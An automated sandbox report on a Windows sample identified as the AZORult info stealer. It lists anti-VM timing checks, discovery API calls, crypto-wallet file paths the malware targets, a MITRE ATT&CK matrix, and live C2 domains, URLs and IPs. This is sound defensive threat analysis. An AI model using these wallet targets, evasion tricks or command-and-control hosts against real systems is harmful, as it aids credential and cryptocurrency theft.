Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B1B8 push 0040B1E4h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E25A push 0040E288h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E25C push 0040E288h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00414A28 push 00414A84h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040BAB8 push 0040BAE4h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00409B54 push 00409BC8h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00409B78 push 00409BC8h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040D378 push 0040D3A8h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040D37C push 0040D3A8h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413B7C push 00413BA8h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B3D8 push 0040B414h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B3DC push 0040B414h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004183E4 push 00418410h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040BBEC push 0040BC18h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00409B90 push 00409BC8h; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413C10 push 00413C3Ch; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00404C1C push 00404C6Dh; ret
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B420 push 0040B44Ch; ret

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	RDTSC instruction interceptor: First address: 00000000021222C8 second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	RDTSC instruction interceptor: First address: 00000000021222CC second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FBD94B9982Ch 0x00000006 rdtsc

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_00415E40 GetSystemInfo,

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00407AF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0046052B mov ebx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00460000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00460000 mov ebx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00460AFD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004606F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004606F5 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004A0000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004A0000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004A0408 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: GetLocaleInfoA,

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_004065F0 GetUserNameW,

Stealing of Sensitive Information:

Yara detected Azorult

Show sources

Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY

Detected AZORult Info Stealer

Show sources

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004186C4
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004186C4

Yara detected Azorult Info Stealer

Show sources

Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: electrum.dat
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %appdata%\Electrum\wallets\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %appdata%\Electrum-LTC\wallets\

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture1	Security Software Discovery11	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	System Owner/User Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery114	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	69%	Virustotal		Browse
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	75%	ReversingLabs	Win32.Infostealer.Coins
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	100%	Avira	HEUR/AGEN.1125422
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125422	Download File

Domains

Source	Detection	Scanner	Link
admin.svapofit.com	9%	Virustotal	Browse
survey-smiles.com	8%	Virustotal	Browse
ww1.survey-smiles.com	9%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://ww1.survey-smiles.com/%	100%	Avira URL Cloud	phishing
http://ww1.survey-smiles.com/e	100%	Avira URL Cloud	phishing
http://admin.svapofit.=	0%	Avira URL Cloud	safe
http://admin.svapofit.com/azs/index.php8	0%	Avira URL Cloud	safe
http://survey-smiles.com/=	0%	Avira URL Cloud	safe
http://survey-smiles.com/csvc	0%	Avira URL Cloud	safe
http://survey-smiles.com/	0%	Avira URL Cloud	safe
http://admin.svapofit.com/azs/index.phpSb	0%	Avira URL Cloud	safe
https://dotbit.me/a/	0%	URL Reputation	safe
http://admin.svapofit.com/	0%	Avira URL Cloud	safe
http://ww1.survey-smiles.com/z	100%	Avira URL Cloud	phishing
http://admin.svapofit.com/azs/index.php	0%	Avira URL Cloud	safe
http://ww1.survey-smiles.com/sof	100%	Avira URL Cloud	phishing
http://ww1.survey-smiles.com/	100%	Avira URL Cloud	phishing
http://survey-smiles.c-k	0%	Avira URL Cloud	safe
http://survey-smiles.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
admin.svapofit.com	63.141.242.43	true	true	9%, Virustotal, Browse	unknown
survey-smiles.com	5.79.68.108	true	false	8%, Virustotal, Browse	unknown
12065.BODIS.com	199.59.242.153	true	false		high
ww1.survey-smiles.com	unknown	unknown	false	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://survey-smiles.com/	false	Avira URL Cloud: safe	unknown
http://admin.svapofit.com/azs/index.php	true	Avira URL Cloud: safe	unknown
http://ww1.survey-smiles.com/	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ww1.survey-smiles.com/%	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
http://ww1.survey-smiles.com/e	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
http://admin.svapofit.=	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	low
http://admin.svapofit.com/azs/index.php8	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://survey-smiles.com/=	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://survey-smiles.com/csvc	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icq.com/legal/eula/en	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	false		high
http://admin.svapofit.com/azs/index.phpSb	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://ip-api.com/json	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	false		high
https://dotbit.me/a/	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	false	URL Reputation: safe	unknown
http://www.icq.com/legal/privacypolicy/en	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	false		high
http://admin.svapofit.com/	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://ww1.survey-smiles.com/z	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
http://ww1.survey-smiles.com/sof	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
http://survey-smiles.c-k	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://survey-smiles.com	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
5.79.68.108	survey-smiles.com	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
199.59.242.153	12065.BODIS.com	United States	395082	BODIS-NJUS	false
63.141.242.43	admin.svapofit.com	United States	33387	NOCIXUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491841
Start date:	28.09.2021
Start time:	00:48:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.5% (good quality ratio 93.2%) Quality average: 79.5% Quality standard deviation: 28.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.209.183, 20.54.110.249, 40.112.88.60, 93.184.221.240, 20.199.120.85, 80.67.82.235, 80.67.82.211, 20.50.102.62, 20.199.120.151, 20.199.120.182 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
5.79.68.108	o8fQ05Cc29.exe	Get hash	malicious	Browse	survey-smiles.com/
	ZIPEXT#U007e1.EXE	Get hash	malicious	Browse	survey-smiles.com/
	es.likisoft.farmalicante.apk	Get hash	malicious	Browse	ad.leadboltads.net/show_app_ad.js?section_id=924902828
199.59.242.153	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	www.anodynemedicalmassage.com/euzn/?G0Ddo=u178RPbEoFHNEMSTYSAKyFLEc68kuAf3hAv/2v3T+vkoQ4nsSSLkzGkhPsJYzpfotw78F7bWTQ==&2dod=HL3Tzluhwhvxcp
	SQLPLUS.EXE	Get hash	malicious	Browse	ww1.weirden.com/
	TNT 07833955.exe	Get hash	malicious	Browse	www.tenncreative.com/b5ce/?C2M=Rg3TsdfntIiWJKNWRmLTqgm5mB7Gwns4ujDsoW9GSorZA7LMeCjIS06nAIZUc2zUa+VgrpSNrw==&2dtd=2dTpyPZX3Tqt_8d0
	LogJhhPPyK.exe	Get hash	malicious	Browse	www.mammutphilippines.com/n90q/?-ZYT=GiWrvS/99XrV+2Uf6Zy/o5YW6c6VukN0OHlBSCCHHBiFQpS9xb5cjKCaQXfJL9Q9t00b&IZsH=3fjpWpD0JdD
	PO.exe	Get hash	malicious	Browse	www.rejddit.com/ig04/?0DH8qx3=3h/Tr838qcHUz18OOMqR99bs8cT2OrpSq2e3FqStS3xcK7WNKLX9gCPVSXRmyxeIco6krjPjWg==&jL3=-ZrdqHw
	D1B9D1321F517D78BC0D1D03C5ED3C20A1CCB85BF755B.exe	Get hash	malicious	Browse	ww4.onlygoodman.com/
	pay.exe	Get hash	malicious	Browse	www.salartfinance.com/t75f/?V6yLxzHh=lAZRvM4hLFtTWseMMjmTcl+RZcUPNrURFXAml9hw9i0ZHFoSyWAXJ/sXcd8B+Vv3Doaf&bX=AdotnVi0RxtDfRqP
	DOC.exe	Get hash	malicious	Browse	www.camham.co.uk/imm8/?oZBd28E8=JSfa42tBaq4a3YeMfphPE2TCUHWdSJf7Yy7nyCnDPKehtAvkSRQbSxaf+1hgIsLr6SVj&7n6hj=p2MtFfu8w4Y
	RFQ.Order 0128-44.exe	Get hash	malicious	Browse	www.glatt.store/5afm/?0FQ0vvt=JMGrtXIs8RtMHth06d94tZTj42tDCsOeVWPwlq/2m+LWjBoF9Wmh8X/iRtktzTq0TwDw&nP=PtUdq8l
	PAYMENT ADVICE.exe	Get hash	malicious	Browse	www.wwwrigalinks.com/bp39/?kd3=7nx4e8sXT&6lTp=toZvbJQL0cTYgDF5OxAGAk7QJRoDVvuNfvSwYwfcNspP7qp4L1Koj5ofZh66BEpk6+Ro
	rex for fs2004__3039_i1291358365_il1363251.exe	Get hash	malicious	Browse	ww1.survey-smiles.com/js/parking.2.69.0.js
	BIN.exe	Get hash	malicious	Browse	www.hauhome.club/n8ba/?I6El7rEX=NUeE9ayc3PySnAVgNXjn0BYB7KGsqh3j5qPQnKWJKMOSIWaR3h7kqTPRULqYbfwLMKP6&yBZ02=2df8xb-H6hatkZkp
	U8mrImRa5n.exe	Get hash	malicious	Browse	www.wwwmacsports.com/nff/?HL3Hu4=m9tMrdH5s5McIQQpiSGs8SInYxUL4H2IAxrYgc1ZIVpX4WbHn5hGWqowwYX2QoAzIcixb1jveg==&b81db=s8SLRRP8
	purchase order No. 00109877 pdf.exe	Get hash	malicious	Browse	www.prepping.store/h388/?S6AhC6=sxj1nv4tRLo8fEEpX4virXwU1x6V8LUDbA8wvNc6PvsTc+vNjCclbHTjPwwtuSYEUDyy&SjQ=Hd3Xox1hjJcpd2
	XTRA POWER SOLAR PRODUCTS - OFF GRID 2021-8-23.xlsx	Get hash	malicious	Browse	www.hauhome.club/n8ba/?C2=krEH&P88pddj=NUeE9ayZ3IyWnQZsPXjn0BYB7KGsqh3j5qXA7JKIOsOTIn2Xwxqo8X3TXuGOfP04HJSKyQ==
	scancopy.exe	Get hash	malicious	Browse	www.signaturelandmarkreo.com/mpus/?jZt=JJBPK2i0&5jvX=x56w9RwRz4AV6CCBrUsBL3ACCQyK2dM3JqMYE8SQI6sq5FNJFnS4ajSVpvFd2wEGM/DV
	0Ol5vRsauA.exe	Get hash	malicious	Browse	www.hauhome.club/n8ba/?gR=3fH8bT-PS&T0G=NUeE9ayc3PySnAVgNXjn0BYB7KGsqh3j5qPQnKWJKMOSIWaR3h7kqTPRULqyEvALIIH6
	PRICE REQUEST 40 ft container x2.xlsx	Get hash	malicious	Browse	www.hauhome.club/n8ba/?p8Y8=mT0xlL38IP&_pp8FF=NUeE9ayZ3IyWnQZsPXjn0BYB7KGsqh3j5qXA7JKIOsOTIn2Xwxqo8X3TXuGOfP04HJSKyQ==
	jxotfrv2bv.exe	Get hash	malicious	Browse	www.pon.xyz/wufn/?UlZh=0rmTI&iR=TjHmMFEU1Fmg2XzTD4fy73K0u4EyZw5fKq8O2A/t56j1GMEWHoQPUZZu8+R7DfoFhDpv
	3Rpt867Unp.exe	Get hash	malicious	Browse	www.elglink99.com/6mam/?2dl4tF=SLcUjScEkW6xUOQFBoDDz2hKjpXj+iqBcrwvzM+4m/NAMuuhQPRgGkr0S29rLHT8R6Zo&d0=z4VPJNO82DhhP

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
survey-smiles.com	EnhancedMap.exe	Get hash	malicious	Browse	5.79.68.110
	EnhancedMap.exe	Get hash	malicious	Browse	5.79.68.107
